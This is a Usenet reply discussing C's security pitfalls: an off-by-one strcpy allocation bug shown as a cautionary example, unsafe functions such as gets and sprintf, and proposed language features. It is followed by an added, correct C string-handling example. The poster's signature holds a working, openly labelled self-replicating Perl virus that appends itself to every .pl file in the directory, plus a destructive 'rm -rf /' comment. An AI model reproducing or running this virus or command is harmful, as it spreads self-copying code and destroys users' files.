Re: Which programming languages in NGE?
Scripsit illa aut ille David Scarlett <look@my.signature>:
> Rudolf Polzer <AntiATField_adsgohere@durchnull.de> wrote in
> news:slrnahtpg5.5i7.AntiATField_adsgohere@www42.durchnull.de:
>
> >> > But probably both C and the current XML will disappear.
>
> What makes you think that? C has been around for over 30 years and is
> still very much alive and kicking....
C is undergoing too many changes. Three widely used standards.
C++ will have a better chance to stay, but I cannot really say C will
disappear. Most C++ compilers will remain able to compile C since
this feature is not much to add to a C++ compiler. It's just that the
number of users of C will decrease to a small minority.
> > And C is the only one of today's
> > languages I would like to see disappear because it caused too
> > many security holes (buffer overrun).
>
> Buffer overruns aren't caused by C. They're caused by incompetence.
> People who don't know why gets() is dangerous shouldn't be using C...
That's what someone in de.comp.security.misc wrote (I hope you see the
mistake):
| char *ptr = malloc (strlen(source));
| if (!ptr) exit (EXIT_FAILURE);
| strcpy (ptr,source);
| /* Wer das nicht kann, sollte IMHO gar nicht C programmieren. */
(If you can't do this, you shouldn't use C)
It happens just too easily because C does not have a string datatype
that does these things for you.
A simple
    #define stralloc(N) calloc ((N) + 1, 1)
(when using calloc, the string returned has zero length, so other
mistakes are avoided)
and this mistake would have gone. Why isn't that in <stdlib.h>?
Then there are no variable-length arrays on the stack. You cannot write
    void f (unsigned int n)
    {
        char a[n];
        /* ... */
    }
Having to use malloc all the time is memory-leak-prone, especially
because there is no better exception handling than atexit() and
longjmp(). This would be another good thing for C:
    void f (unsigned int n)
    {
        char *a = malloc (n);
        do
        {
            /* ... */
            for (/* ... */)
            {
                /* ... */
                if (somethingstrangehappened)
                    return;
            }
            /* ... */
        }
        onreturn /* only executed when using return */
        {
            puts ("something strange happened");
        }
        onleave /* always executed after leaving the block, using return or
                   regularly */
        {
            free (a);
        }
        puts ("do block did not use return");
    }
(onreturn/onleave should even work when exiting from the block using return
- I know this would be a hassle to implement, but in every return the
compiler knows the chain of onexit blocks to execute so it could compile
them as functions and call them like functions before generating the RET,
so it's still simpler than exception handling)
And gets() is not the only such function. sprintf, *scanf etc. are just
as dangerous and especially for sprintf there is no safe ANSI C
replacement - snprintf has been introduced in C99 which many programmers
avoid for compatibility with older compilers and the really safe asprintf
(using this you don't have to worry about buffer sizes, therefore you
cannot make a mistake using it) is a GNU extension, not even C99.
Another flaw is that 'unsigned' is a longer word than 'int', therefore
many programmers use signed integers where unsigned ones are correct.
Turbo Pascal did this right, 'integer' was longer than 'word'...
--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################
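
An added example, not part of the original post: the string copy from the quoted snippet with room for the terminator, and an asprintf-like formatter built only on C99's vsnprintf (measure first, then allocate). The names dup_string and format_alloc are hypothetical, and the input strings are constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copy a string into a fresh heap buffer. The quoted snippet allocated
 * strlen(source) bytes, one short of what strcpy writes; the terminating
 * NUL needs the extra byte. Returns NULL on allocation failure. */
char *dup_string(const char *source)
{
    size_t len = strlen(source);
    char *copy = malloc(len + 1);      /* +1 for the '\0' */
    if (copy == NULL)
        return NULL;
    memcpy(copy, source, len + 1);     /* copies the terminator too */
    return copy;
}

/* asprintf-like formatter using only C99: ask vsnprintf for the required
 * length first, then allocate exactly that and format again.
 * Returns a malloc'd string, or NULL on encoding/allocation error. */
char *format_alloc(const char *fmt, ...)
{
    va_list ap, ap2;
    va_start(ap, fmt);
    va_copy(ap2, ap);                  /* a va_list may be walked only once */
    int needed = vsnprintf(NULL, 0, fmt, ap);   /* length without '\0' */
    va_end(ap);

    char *out = NULL;
    if (needed >= 0 && (out = malloc((size_t)needed + 1)) != NULL)
        vsnprintf(out, (size_t)needed + 1, fmt, ap2);
    va_end(ap2);
    return out;
}

int main(void)
{
    char *name = dup_string("example");               /* constructed input */
    char *line = format_alloc("%s has %d bytes", name ? name : "?", 7);
    if (line != NULL)
        puts(line);
    free(line);
    free(name);
    return 0;
}
```

The caller owns both returned buffers and must free() them.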